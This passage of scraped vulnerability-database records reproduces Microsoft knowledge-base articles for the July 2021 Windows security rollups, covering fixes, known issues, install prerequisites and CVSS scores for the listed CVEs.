(0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004289>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004289](<https://download.microsoft.com/download/b/2/9/b29d47d0-9fa7-4d8e-ad43-797c522305ac/5004289.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004289 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-33757", "CVE-2021-34496"], "modified": "2021-07-13T07:00:00", "id": "KB5004289", "href": "https://support.microsoft.com/en-us/help/5004289", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:16:21", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004955](<https://support.microsoft.com/help/5004955>) (released July 6, 2021) and addresses the following issues: \n\n * Addresses an issue in which some EMFs built by using third-party applications that use **ExtCreatePen** and **ExtCreateFontIndirect** render incorrectly.\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-33757>). For more information, see [KB5004605](<https://support.microsoft.com/help/5004605>).\n * Removes support for the **PerformTicketSignature** setting and permanently enables **Enforcement mode**. [For more information and additional steps to enable protection on domain controller servers, see Managing deployment of Kerberos S4U changes for CVE-2020-17049.](<https://support.microsoft.com/help/4598347>)\n * Security updates to Windows Apps, Windows Fundamentals, Windows Authentication, Windows Graphics, Windows HTML Platforms, and Windows MSHTML Platform.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices which are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>), might fail to print when using smart-card (PIV) authentication.| For more information on this issue, please see [KB5005408 - Smart-card authentication might cause print and scan failures](<https://support.microsoft.com/help/5005408>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004305>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004305](<https://download.microsoft.com/download/f/9/7/f978ea6e-6cd9-4e04-bbd4-c9b1d1372586/5004305.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004305 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-33757", "CVE-2021-34444"], "modified": "2021-07-13T07:00:00", "id": "KB5004305", "href": "https://support.microsoft.com/en-us/help/5004305", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:50:44", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include the following: \n\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-33757>). For more information, see [KB5004605](<https://support.microsoft.com/help/5004605>).\n * Removes support for the **PerformTicketSignature** setting and permanently enables **Enforcement mode**. [For more information and additional steps to enable protection on domain controller servers, see Managing deployment of Kerberos S4U changes for CVE-2020-17049.](<https://support.microsoft.com/help/4598347>)\n * Security updates to Windows Apps, Windows Fundamentals, Windows Authentication, Windows Operating System Security, and Windows Graphics.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices which are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>), might fail to print when using smart-card (PIV) authentication.| For more information on this issue, please see [KB5005408 - Smart-card authentication might cause print and scan failures](<https://support.microsoft.com/help/5005408>). \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5004233](<https://support.microsoft.com/help/5004233>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004285>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004285](<https://download.microsoft.com/download/4/8/e/48e7fb1b-c9ea-4fb6-9fa8-7bec0eba1512/5004285.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004285 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33757", "CVE-2020-17049", "CVE-2021-34459"], "modified": "2021-07-13T07:00:00", "id": "KB5004285", "href": "https://support.microsoft.com/en-us/help/5004285", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:50:49", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nWSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include the following: \n\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-33757>). For more information, see [KB5004605](<https://support.microsoft.com/help/5004605>).\n * Removes support for the **PerformTicketSignature** setting and permanently enables **Enforcement mode**. [For more information and additional steps to enable protection on domain controller servers, see Managing deployment of Kerberos S4U changes for CVE-2020-17049.](<https://support.microsoft.com/help/4598347>)\n * Security updates to Windows Apps, Windows Fundamentals, Windows Authentication, and Windows Graphics.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices which are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>), might fail to print when using smart-card (PIV) authentication.| For more information on this issue, please see [KB5005408 - Smart-card authentication might cause print and scan failures](<https://support.microsoft.com/help/5005408>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5004233](<https://support.microsoft.com/help/5004233>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004299>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004299](<https://download.microsoft.com/download/3/f/c/3fccfcfa-da17-4e5d-8016-e3fae8dde731/5004299.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004299 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34444", "CVE-2021-33757", "CVE-2020-17049"], "modified": "2021-07-13T07:00:00", "id": "KB5004299", "href": "https://support.microsoft.com/en-us/help/5004299", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-16T18:14:57", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include the following: \n\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-33757>). For more information, see [KB5004605](<https://support.microsoft.com/help/5004605>).\n * Removes support for the **PerformTicketSignature** setting and permanently enables **Enforcement mode**. [For more information and additional steps to enable protection on domain controller servers, see Managing deployment of Kerberos S4U changes for CVE-2020-17049.](<https://support.microsoft.com/help/4598347>)\n * Security updates to Windows Apps, Windows Fundamentals, Windows Authentication, Windows Operating System Security, and Windows Graphics.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices which are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>), might fail to print when using smart-card (PIV) authentication.| For more information on this issue, please see [KB5005408 - Smart-card authentication might cause print and scan failures](<https://support.microsoft.com/help/5005408>). \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5004233](<https://support.microsoft.com/help/5004233>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004302>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004302](<https://download.microsoft.com/download/d/2/1/d21b72bd-7f99-4ec8-b5d1-413e18c923ae/5004302.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004302 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33757", "CVE-2020-17049", "CVE-2021-34459"], "modified": "2021-07-13T07:00:00", "id": "KB5004302", "href": "https://support.microsoft.com/en-us/help/5004302", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:50:54", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases 